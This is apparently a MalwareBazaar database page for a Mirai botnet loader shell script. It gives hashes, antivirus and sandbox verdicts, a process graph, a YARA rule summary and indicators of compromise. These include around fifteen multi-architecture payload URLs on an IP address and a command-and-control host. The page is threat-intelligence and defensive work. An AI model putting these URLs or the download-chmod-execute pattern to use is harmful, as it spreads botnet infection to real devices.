MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 9c2c65216f91d93de214d81bdec0dd067e079d81a8fd618c45eef8437e162a1d. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 10


Intelligence 10 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 9c2c65216f91d93de214d81bdec0dd067e079d81a8fd618c45eef8437e162a1d
SHA3-384 hash: 47d95bf283902424232c92ab0b0fc4a2eb853f7bc0070c6451c81bedef3c11023ef4b9fafd17992c70bc606d19de07b8
SHA1 hash: 688279dad3809e88aceecafdcebbfba7dcd870ae
MD5 hash: c9b559b4a8e1def2037f1c5a8ea0993c
humanhash: video-virginia-texas-freddie
File name:mao_http.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:3'211 bytes
First seen:2026-02-03 09:14:17 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 96:geEUuA1gZW8YKmsKo5MZmzizgSwGMIaMGSweSQ:4Sn
TLSH T1FF612BFD41A0BF93CC85A94CBA2483A1730B91F5FD72F63C9C584A6A4481B15349BEBD
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://185.242.3.127/bins/mao.x86_6480e2ffefac43ba12de92a71d3fb462576c6e13618faf4b1162198410a0f8f953 Miraielf mirai ua-wget
http://185.242.3.127/bins/mao.x863ae5b43af044c95ac0bdfd11fe1dfe5ef37d8d81b83e478995945d49e54ba029 Miraielf mirai ua-wget
http://185.242.3.127/bins/mao.mipse40c0cd39b6c1dc46d498c8825377fbd027676188b6f69f6d0536191fc194ae2 Miraielf mirai ua-wget
http://185.242.3.127/bins/mao.mpslf419112ecb752170cf2e117417d2b1e3c18c80d14eedee75f7f80c81e68272a5 Miraielf mirai ua-wget
http://185.242.3.127/bins/mao.arm80dd7e14890056e8275cd36ec1e86acf6a068d3fa6262faff62b8ba0b5897fa3 Miraielf mirai ua-wget
http://185.242.3.127/bins/mao.arm5c9ddb41ae3612864c9cef07da4512ccb04981be9ec81b7f74a96c92cc4f853ab Miraielf mirai ua-wget
http://185.242.3.127/bins/mao.arm68261d005bbf69978d5d337c1475603aca6a5e81887b484742dd280582ee30495 Miraielf mirai ua-wget
http://185.242.3.127/bins/mao.arm738a61bd124a9326a536056f65f7512fda68c3b183ebc72371fdc51abc72f2a31 Miraielf mirai ua-wget
http://185.242.3.127/bins/mao.ppce756a7caf506a44545930ba42f95500c01128d2d980069cffed3b6811da9e552 Miraielf mirai ua-wget
http://185.242.3.127/bins/mao.m68ke829fb7b39b54bedb0bc392689ae97e266d7dba40d758b4e57ffecb3ea7fbdb8 Miraielf mirai ua-wget
http://185.242.3.127/bins/mao.sh47575a248e59f4cc82d111b2098c64ee7cfe04f2b6c29f30972b40adef8c724ed Miraielf mirai ua-wget
http://185.242.3.127/bins/mao.spc19ec1515e9e41398425f0d08bab481eb2247046820da8d0bc9a7ad5e8c9cb5aa Miraielf mirai ua-wget
http://185.242.3.127/bins/mao.arcn/an/aelf mirai ua-wget
http://185.242.3.127/bins/mao.i686231011f653fd0aa0cc0d4a2d89d36919e5b96df96cd73a13dce87af4cfd06b60 Miraielf mirai ua-wget
http://185.242.3.127/bins/mao.i486f28646911f9785e1d4dd5c5c78f6034281d92b89f167392e28a1e065c3580538 Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
52
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Detection(s):
Sanesecurity.Malware.30790.LX.BOT.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-29.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
bash evasive lolbin mirai obfuscated
Link:
https://www.filescan.io/uploads/6981bc74930564ff3c864d21/reports/ffba418a-bc43-4276-8612-10b7f4dab880/overview
Result
Gathering data
Verdict:
Malicious
File Type:
unix shell
Detections:
HEUR:Trojan-Downloader.Shell.Agent.a
Link:
https://opentip.kaspersky.com/9c2c65216f91d93de214d81bdec0dd067e079d81a8fd618c45eef8437e162a1d/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/b59e7cbe-bf50-4d7a-85f1-55342bd9ebc9
Behavior Graph:
Download SVG
%3 guuid=c178c904-1700-0000-feeb-2626960d0000 pid=3478 /usr/bin/sudo guuid=32f7ed06-1700-0000-feeb-26269e0d0000 pid=3486 /tmp/sample.bin guuid=c178c904-1700-0000-feeb-2626960d0000 pid=3478->guuid=32f7ed06-1700-0000-feeb-26269e0d0000 pid=3486 execve guuid=01a04d07-1700-0000-feeb-26269f0d0000 pid=3487 /usr/bin/wget net send-data write-file guuid=32f7ed06-1700-0000-feeb-26269e0d0000 pid=3486->guuid=01a04d07-1700-0000-feeb-26269f0d0000 pid=3487 execve guuid=a9f57b0c-1700-0000-feeb-2626a00d0000 pid=3488 /usr/bin/chmod guuid=32f7ed06-1700-0000-feeb-26269e0d0000 pid=3486->guuid=a9f57b0c-1700-0000-feeb-2626a00d0000 pid=3488 execve guuid=05dbbd0c-1700-0000-feeb-2626a10d0000 pid=3489 /tmp/mao_bot net guuid=32f7ed06-1700-0000-feeb-26269e0d0000 pid=3486->guuid=05dbbd0c-1700-0000-feeb-2626a10d0000 pid=3489 execve guuid=24801610-1700-0000-feeb-2626aa0d0000 pid=3498 /usr/bin/curl net send-data write-file guuid=32f7ed06-1700-0000-feeb-26269e0d0000 pid=3486->guuid=24801610-1700-0000-feeb-2626aa0d0000 pid=3498 execve guuid=b43ae419-1700-0000-feeb-2626c20d0000 pid=3522 /usr/bin/chmod guuid=32f7ed06-1700-0000-feeb-26269e0d0000 pid=3486->guuid=b43ae419-1700-0000-feeb-2626c20d0000 pid=3522 execve guuid=2ec7251a-1700-0000-feeb-2626c30d0000 pid=3523 /tmp/mao_bot net guuid=32f7ed06-1700-0000-feeb-26269e0d0000 pid=3486->guuid=2ec7251a-1700-0000-feeb-2626c30d0000 pid=3523 execve guuid=5d9b041d-1700-0000-feeb-2626cc0d0000 pid=3532 /usr/bin/wget net send-data write-file guuid=32f7ed06-1700-0000-feeb-26269e0d0000 pid=3486->guuid=5d9b041d-1700-0000-feeb-2626cc0d0000 pid=3532 execve guuid=7956f023-1700-0000-feeb-2626e50d0000 pid=3557 /usr/bin/chmod guuid=32f7ed06-1700-0000-feeb-26269e0d0000 pid=3486->guuid=7956f023-1700-0000-feeb-2626e50d0000 pid=3557 execve guuid=0fce3f24-1700-0000-feeb-2626e70d0000 pid=3559 /tmp/mao_bot net guuid=32f7ed06-1700-0000-feeb-26269e0d0000 pid=3486->guuid=0fce3f24-1700-0000-feeb-2626e70d0000 pid=3559 execve 4961af98-ecbe-5da4-a0d2-a0d40ca0d25a 185.242.3.127:80 guuid=01a04d07-1700-0000-feeb-26269f0d0000 pid=3487->4961af98-ecbe-5da4-a0d2-a0d40ca0d25a send: 143B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=05dbbd0c-1700-0000-feeb-2626a10d0000 pid=3489->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=24801610-1700-0000-feeb-2626aa0d0000 pid=3498->4961af98-ecbe-5da4-a0d2-a0d40ca0d25a send: 92B guuid=2ec7251a-1700-0000-feeb-2626c30d0000 pid=3523->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=5d9b041d-1700-0000-feeb-2626cc0d0000 pid=3532->4961af98-ecbe-5da4-a0d2-a0d40ca0d25a send: 140B guuid=0fce3f24-1700-0000-feeb-2626e70d0000 pid=3559->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=07326624-1700-0000-feeb-2626e80d0000 pid=3560 /tmp/mao_bot guuid=0fce3f24-1700-0000-feeb-2626e70d0000 pid=3559->guuid=07326624-1700-0000-feeb-2626e80d0000 pid=3560 clone guuid=f8046924-1700-0000-feeb-2626e90d0000 pid=3561 /tmp/mao_bot dns net send-data zombie guuid=0fce3f24-1700-0000-feeb-2626e70d0000 pid=3559->guuid=f8046924-1700-0000-feeb-2626e90d0000 pid=3561 clone guuid=f8046924-1700-0000-feeb-2626e90d0000 pid=3561->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 87B a11803fe-5fd8-544d-b13b-84f58f3c81f8 mn.34509.su:25565 guuid=f8046924-1700-0000-feeb-2626e90d0000 pid=3561->a11803fe-5fd8-544d-b13b-84f58f3c81f8 send: 26B guuid=00748024-1700-0000-feeb-2626eb0d0000 pid=3563 /tmp/mao_bot guuid=f8046924-1700-0000-feeb-2626e90d0000 pid=3561->guuid=00748024-1700-0000-feeb-2626eb0d0000 pid=3563 clone guuid=3dd78324-1700-0000-feeb-2626ec0d0000 pid=3564 /tmp/mao_bot dns net send-data guuid=f8046924-1700-0000-feeb-2626e90d0000 pid=3561->guuid=3dd78324-1700-0000-feeb-2626ec0d0000 pid=3564 clone guuid=3dd78324-1700-0000-feeb-2626ec0d0000 pid=3564->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 87B guuid=3dd78324-1700-0000-feeb-2626ec0d0000 pid=3564->a11803fe-5fd8-544d-b13b-84f58f3c81f8 send: 26B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/9c2c65216f91d93de214d81bdec0dd067e079d81a8fd618c45eef8437e162a1d
Gathering data
Verdict:
Malicious
Threat:
Family.MIRAI
Link:
https://tip.neiki.dev/file/9c2c65216f91d93de214d81bdec0dd067e079d81a8fd618c45eef8437e162a1d
Threat name:
Script-Shell.Trojan.Vigorf
Create hunting rule
Status:
Malicious
First seen:
2026-02-03 09:17:16 UTC
File Type:
Text (Shell)
AV detection:
8 of 36 (22.22%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=tqwgkilpshmt3yqu3an55qg5az7aphmbvd6wddcf534eg7qwfioq._file
Result
Malware family:
mirai
Create hunting rule
Score:
  10/10
Tags:
family:mirai antivm botnet defense_evasion discovery linux
Link:
https://tria.ge/reports/260203-k7h9kaay4g/
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Checks CPU configuration
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Creates a large amount of network flows
Mirai
Mirai family
Malware family:
Mirai
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/9c2c65216f91/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
0.75
Link:
https://yomi.yoroi.company/submissions/9c2c65216f91d93de214d81bdec0dd067e079d81a8fd618c45eef8437e162a1d

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Create hunting rule
Author:Anish Bogati
Description:Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference:MalwareBazaar sample lilin.sh

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh 9c2c65216f91d93de214d81bdec0dd067e079d81a8fd618c45eef8437e162a1d

(this sample)

Mirai

elf 80e2ffefac43ba12de92a71d3fb462576c6e13618faf4b1162198410a0f8f953

  
URLhaus
https://urlhaus.abuse.ch/url/3766683/
  
Delivery method
Distributed via web download
  
URLhaus
https://urlhaus.abuse.ch/url/3766751/
  
Dropping
MD5 e106a050f05085b99951e94866d82a4e
  
Dropping
SHA256 80e2ffefac43ba12de92a71d3fb462576c6e13618faf4b1162198410a0f8f953

Comments